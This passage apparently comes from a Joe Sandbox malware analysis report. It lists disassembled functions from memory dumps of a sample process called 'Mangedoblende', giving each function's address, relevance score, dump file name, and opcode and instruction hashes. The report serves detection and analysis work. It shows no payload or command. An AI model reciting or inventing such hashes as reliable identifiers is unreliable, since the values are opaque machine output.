                                                                                                                                                                            • Opcode Fuzzy Hash: 0da45a7c9ed582d2a93eb632c04c2494716478e2ad9db62b896a534636d1af59
                                                                                                                                                                            • Instruction Fuzzy Hash: 9171B374E04618CFDB05DFA9C990ADDBBF2EF89300F248129E414AB365EB359942DF54
                                                                                                                                                                            Function 228373E0 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5266292ab0859e657f0d0372b9da75874de9bf68ff37413627890a0edd561ada
                                                                                                                                                                            • Instruction ID: 05b03cdc70d44e02398a77a5fb925c8605fbd1fb2851d5fb3477c40fa1f795fc
                                                                                                                                                                            • Opcode Fuzzy Hash: 5266292ab0859e657f0d0372b9da75874de9bf68ff37413627890a0edd561ada
                                                                                                                                                                            • Instruction Fuzzy Hash: A271B274E04618CFDB05DFA9C990ADDBBB2FF89300F24852AD404AB369DB359982DF54
                                                                                                                                                                            Function 228421B8 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f44f07033389f124411f0bec2f44939cca20c04a6c5592a5de826a03733f5d7c
                                                                                                                                                                            • Instruction ID: 64cf4a972d832cab36b9ada5d9845212e511efb1b244c5b278137a290674841d
                                                                                                                                                                            • Opcode Fuzzy Hash: f44f07033389f124411f0bec2f44939cca20c04a6c5592a5de826a03733f5d7c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A71C174E04618CFDB05DFA5C980ADDBBB2FF89300F648129D804AB369DB799982DF50
                                                                                                                                                                            Function 228481E8 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 72062dd380f3cf1d684f5b1a17022f142162a7b3ee03f52b19cb3d90b957b77d
                                                                                                                                                                            • Instruction ID: ebb28b795d45dfa6770f871f008406f140afc8e8fd8113bbfdbc267921a7a02f
                                                                                                                                                                            • Opcode Fuzzy Hash: 72062dd380f3cf1d684f5b1a17022f142162a7b3ee03f52b19cb3d90b957b77d
                                                                                                                                                                            • Instruction Fuzzy Hash: 4871A078E04618CFDB05DFA5C990ADDBBB2BF89300F608129D805BB369DB399942DF54
                                                                                                                                                                            Function 0018F72C Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f8b95f4dad72c7f7450f97537c46bc8109b25ef5a8e5818fe728555d3928d3bb
                                                                                                                                                                            • Instruction ID: e35dcaa34ba8ce3e3220593de6b71d4ccc63acd6ac37cb84d4029310a8def070
                                                                                                                                                                            • Opcode Fuzzy Hash: f8b95f4dad72c7f7450f97537c46bc8109b25ef5a8e5818fe728555d3928d3bb
                                                                                                                                                                            • Instruction Fuzzy Hash: 31510274D00219CFDB15DFA5C984BADBBB2FF89300F608529E805AB2A9DB755A85CF40
                                                                                                                                                                            Function 0018D553 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 61ba557877797630e56615dc9aede7133cca372036fb2411bf070a88314e50a4
                                                                                                                                                                            • Instruction ID: fe7689cabe41087c34beae3538106e033438ec2c312cc43101fbd01072ca342e
                                                                                                                                                                            • Opcode Fuzzy Hash: 61ba557877797630e56615dc9aede7133cca372036fb2411bf070a88314e50a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 86517274E01218DFDB48DFA9D9849DDBBF2BF89300F249169E809AB365DB30A905CF50
                                                                                                                                                                            Function 2283FB37 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a60d2959f1f99497db992a692ba256146823db92143a977f209fccbeb2929b68
                                                                                                                                                                            • Instruction ID: 426b5e47baf0236c54ba516653db27aa4f25e9a387eca16b1ebf137fd32d7a7a
                                                                                                                                                                            • Opcode Fuzzy Hash: a60d2959f1f99497db992a692ba256146823db92143a977f209fccbeb2929b68
                                                                                                                                                                            • Instruction Fuzzy Hash: E741B178D04209CFDB44DFA4D9847EDBBF1AF59300F20852AD405A7264DB385A46DF90
                                                                                                                                                                            Function 2283FB48 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6a5168efea0e8e43acf369fee5bfddaa11ab1247e742040f6896192c130ae2a2
                                                                                                                                                                            • Instruction ID: 6911ad4028e27f0843849327ea392b20e1c8d4c6f425ca7ae2e58eaea0611709
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a5168efea0e8e43acf369fee5bfddaa11ab1247e742040f6896192c130ae2a2
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41A178D04218CFDB44DFA5D9947EDBBF2BF49300F20852AD405A7264EB386A46CF94
                                                                                                                                                                            Function 00185658 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 34d3bf17c7f2ee393dd4f4e08068ea5719851ed24fbe03fcee5db158d8021758
                                                                                                                                                                            • Instruction ID: deddd2221d3e095658b43f011c9dd1eaf1c53db9f166ad4244596e4e18befa56
                                                                                                                                                                            • Opcode Fuzzy Hash: 34d3bf17c7f2ee393dd4f4e08068ea5719851ed24fbe03fcee5db158d8021758
                                                                                                                                                                            • Instruction Fuzzy Hash: 62316B316045099FCF15AF64C894AAE3BB7FF89300F508025F81587255DB39DE61EFA1
                                                                                                                                                                            Function 00189C30 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1e631e2e44bc9b423a1e62e937c4284825343701e58814d20bc9399b078effa0
                                                                                                                                                                            • Instruction ID: 14d1027912879be2863342c75c6384120f3de923474d47ef3e11ce063cbd0861
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e631e2e44bc9b423a1e62e937c4284825343701e58814d20bc9399b078effa0
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A316B307002498FDB00EFA8C844B7ABBE6EF88315F588566E908CB255E775DE41DBA1
                                                                                                                                                                            Function 2283E588 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: de023948a0a843cfbbd06a1444e6c457802113b49a2158a29349bb42ec37ab70
                                                                                                                                                                            • Instruction ID: d7ae3eb450294c6d840c31bcbbd92f8bf6fe34d0861c5ace161a81bf7e33296d
                                                                                                                                                                            • Opcode Fuzzy Hash: de023948a0a843cfbbd06a1444e6c457802113b49a2158a29349bb42ec37ab70
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C31033B70025ACBCB07CB68CA8499EB7B6BF46214B144525E518D72A3EB30DD51CBD1
                                                                                                                                                                            Function 228373D0 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0ecaa6ce4681099b627503d4ffca62309de2e27f3abf38cf2546b011faa50a6e
                                                                                                                                                                            • Instruction ID: b0660507cd8d57ae7744e0edfe709c68bddad5697b2938892654c5f1e8139449
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ecaa6ce4681099b627503d4ffca62309de2e27f3abf38cf2546b011faa50a6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5931E374E01308CFDB05DFAAC9506DEBBF2AF89300F24D46AD418AB265EB349942CF55
                                                                                                                                                                            Function 2283D401 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e94da388136dca306fbb2f2eb3c61aa71a143131352a08448f555daed76a0f42
                                                                                                                                                                            • Instruction ID: ca0665d35546af8fb0ee8d0b627fcbea57df63cb29d57162f8700d49649ef05c
                                                                                                                                                                            • Opcode Fuzzy Hash: e94da388136dca306fbb2f2eb3c61aa71a143131352a08448f555daed76a0f42
                                                                                                                                                                            • Instruction Fuzzy Hash: 2831E7B5E00308CBDB05DFAAC5406DDBBF2AF89300F24D12AE418AB255EB349946CF90
                                                                                                                                                                            Function 22848461 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 820a6b7ffe81fea0f90cfd9d290f5308f49c5cb567b810f0c81f659bd28617e4
                                                                                                                                                                            • Instruction ID: 7c05da9706507ce0ff63867a3374e55714aea2bface833725f268e73c9dd79b5
                                                                                                                                                                            • Opcode Fuzzy Hash: 820a6b7ffe81fea0f90cfd9d290f5308f49c5cb567b810f0c81f659bd28617e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A310374D00658CFDB08DFAAD9506DDBBF2AF8A300F54D12AC418BB2A8DB749942CF14
                                                                                                                                                                            Function 228370AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 605b8b67791ba57411904e41c836673f687bc3c53d8b1e5d924bda0c6924aca1
                                                                                                                                                                            • Instruction ID: 9a51688e0782c0a5992b4131669497c64bf742b0e46458dc8c7c949225d91b20
                                                                                                                                                                            • Opcode Fuzzy Hash: 605b8b67791ba57411904e41c836673f687bc3c53d8b1e5d924bda0c6924aca1
                                                                                                                                                                            • Instruction Fuzzy Hash: 9131F274E00208CFDB08CFAAC9406DEBBF2BF89300F14D12AD418AB268DB349946CF50
                                                                                                                                                                            Function 228421A7 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e197c3329538e286122d6a7ec8f9195b681ffaf6f12114a670db1a431e0dafbc
                                                                                                                                                                            • Instruction ID: 8d545d59df4821951e089639f9d121dfdec4fa696246bdd685ba6879c318648b
                                                                                                                                                                            • Opcode Fuzzy Hash: e197c3329538e286122d6a7ec8f9195b681ffaf6f12114a670db1a431e0dafbc
                                                                                                                                                                            • Instruction Fuzzy Hash: 8931D274E05248CFDB04CFAAC9506DEBBF2AF89300F24D42AC418BB268DB749942CF55
                                                                                                                                                                            Function 2284FB23 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f25f9a84fc503985e8d0c8fd922f3243e6f14f4871074ff235f1f072a1b4d081
                                                                                                                                                                            • Instruction ID: 2b689b02ddcb2d9562d590e0595c05996ae6d335ccbb6239d5ff9a2d1ba4e8a7
                                                                                                                                                                            • Opcode Fuzzy Hash: f25f9a84fc503985e8d0c8fd922f3243e6f14f4871074ff235f1f072a1b4d081
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A31E374E01658CFDB08CFAAD9406EDBBF2AF99300F10D12AD418AB269DB349946CF54
                                                                                                                                                                            Function 22816629 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e221c0b4768c37c2f5ced1ff81dce6585f057b1b59232822433a7f8a4b644fb0
                                                                                                                                                                            • Instruction ID: f65b786b88849114bed3bdbe2fbe79d1d81dc3d5f86076258ee76cb427aa3c28
                                                                                                                                                                            • Opcode Fuzzy Hash: e221c0b4768c37c2f5ced1ff81dce6585f057b1b59232822433a7f8a4b644fb0
                                                                                                                                                                            • Instruction Fuzzy Hash: F33103B5D00228CFDB14CFA6D59469DBBF2BF89304F20C06AC058AB294EB389842CF14
                                                                                                                                                                            Function 00188380 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7028ae21535cd8db3c74b23fd9485d18972ad60a9c8a84e07f49ea881873e627
                                                                                                                                                                            • Instruction ID: e920691c2aa8212d35e50bea4d3123b4e9fb90f541a5ce811aaf00b640ed6cc7
                                                                                                                                                                            • Opcode Fuzzy Hash: 7028ae21535cd8db3c74b23fd9485d18972ad60a9c8a84e07f49ea881873e627
                                                                                                                                                                            • Instruction Fuzzy Hash: 0321F6323042164BDB157A79849473E3297AFC4749FA58039D802CB7A9EF79CD42DB81
                                                                                                                                                                            Function 0018A3E4 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ef30a24c14a91e6301e772d84884548d5b5bb5c6326e36ca859e0ee8a49d7b20
                                                                                                                                                                            • Instruction ID: c1046fbca88315a5c01fc8be27ab8aeb268b613a2a73f8a22d5c9bbeb5c65d48
                                                                                                                                                                            • Opcode Fuzzy Hash: ef30a24c14a91e6301e772d84884548d5b5bb5c6326e36ca859e0ee8a49d7b20
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31C1316042458FEF15DF68C848B6ABFF1AF85310F0981A6E459DB2A2D3B4ED40CF62
                                                                                                                                                                            Function 228481EA Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8c31a847a9db6e6a685f336c63c86c0606733c7c5d13af7f2014b7be1ca9c16d
                                                                                                                                                                            • Instruction ID: 38a12b2ee922faa50fc39f7f393bea8c7926c12129eb407116d93c77f9a20720
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c31a847a9db6e6a685f336c63c86c0606733c7c5d13af7f2014b7be1ca9c16d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31A574D01658CFDB04DFAAD9406DDBBF2AF89300F64D12AD418BB264DB349942CF54
                                                                                                                                                                            Function 001828F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2c7f8c424c25749f8d1555769723ea4a506e3d20d5150a067a8e9a0fe91df1a5
                                                                                                                                                                            • Instruction ID: f2aced27c7b7e71fbebb78949c158648187512ef8138cfb4b4e53021db4fd270
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c7f8c424c25749f8d1555769723ea4a506e3d20d5150a067a8e9a0fe91df1a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 39217C35E002259FCB16DB24C940AAE77A5EBDD364F608019D80A9B264DB34EE42CBD0
                                                                                                                                                                            Function 0009D554 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3332860487.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_9d000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ae93b66653326a8c58cebec8f53e1dd7a3fc9a2efbf4aa8196a85959f3f44462
                                                                                                                                                                            • Instruction ID: 63ed667782708052071e685d44ab7665e78dcf77d054d029f01292637afde6ff
                                                                                                                                                                            • Opcode Fuzzy Hash: ae93b66653326a8c58cebec8f53e1dd7a3fc9a2efbf4aa8196a85959f3f44462
                                                                                                                                                                            • Instruction Fuzzy Hash: 332137B1544240DFCF15DF14D9C0F2ABFA5FB98324F24C56AE9090B246C336D816EBA2
                                                                                                                                                                            Function 00186300 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1bbe91eac57e6f4ff659f32e94d6488855a646a77d01a3685caa005eedbf2fd8
                                                                                                                                                                            • Instruction ID: d41212ef79b2b20f1be199952a756ced54b941e7efb9657ea0bff7d71ad1b9c0
                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbe91eac57e6f4ff659f32e94d6488855a646a77d01a3685caa005eedbf2fd8
                                                                                                                                                                            • Instruction Fuzzy Hash: CE21E7357009119FC729AB29C45492EB3A6FFC97517154138EC0ACB358CF34DD028F80
                                                                                                                                                                            Function 000AD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3332904191.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_ad000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d0231f900bc821ff3f8de8e90c0ff36bd162eef219746328ddb01e86712753f4
                                                                                                                                                                            • Instruction ID: bf7d0d46113123cded225423ad2bab501e01560fece5b02f653d3db8564bf3c5
                                                                                                                                                                            • Opcode Fuzzy Hash: d0231f900bc821ff3f8de8e90c0ff36bd162eef219746328ddb01e86712753f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 09214971504204EFCB21CF64C9C4F26BBA1FB89314F20CA6EE94A4F742C73AD846CA61
                                                                                                                                                                            Function 00185649 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1a44f16c373d8255862c4e00bd675b6c787645d31fd363066c43460e64aad325
                                                                                                                                                                            • Instruction ID: 3a0dcf852eb46531e9e800acb04dc5773a7c5315ae326b91f0e376e4bfa2d952
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a44f16c373d8255862c4e00bd675b6c787645d31fd363066c43460e64aad325
                                                                                                                                                                            • Instruction Fuzzy Hash: 3721D1316055089FCF19AF64C854AAE3BB2FB89311F504069F805CB35ADB388E61DF91
                                                                                                                                                                            Function 00184285 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 15f8c16ad58ab80ade8e338daf1062ffb6284c32df30bfcab0ecbe31c01fd8cc
                                                                                                                                                                            • Instruction ID: 993eb0185e7aed05cf7bd4f0758712c711d89060d28209a3865b7cc5b7adffc4
                                                                                                                                                                            • Opcode Fuzzy Hash: 15f8c16ad58ab80ade8e338daf1062ffb6284c32df30bfcab0ecbe31c01fd8cc
                                                                                                                                                                            • Instruction Fuzzy Hash: CE319078E15209DFCB49DFA8D5848ADBBB6FF49301B204469E809AB368DB35AD05CF10
                                                                                                                                                                            Function 00189761 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
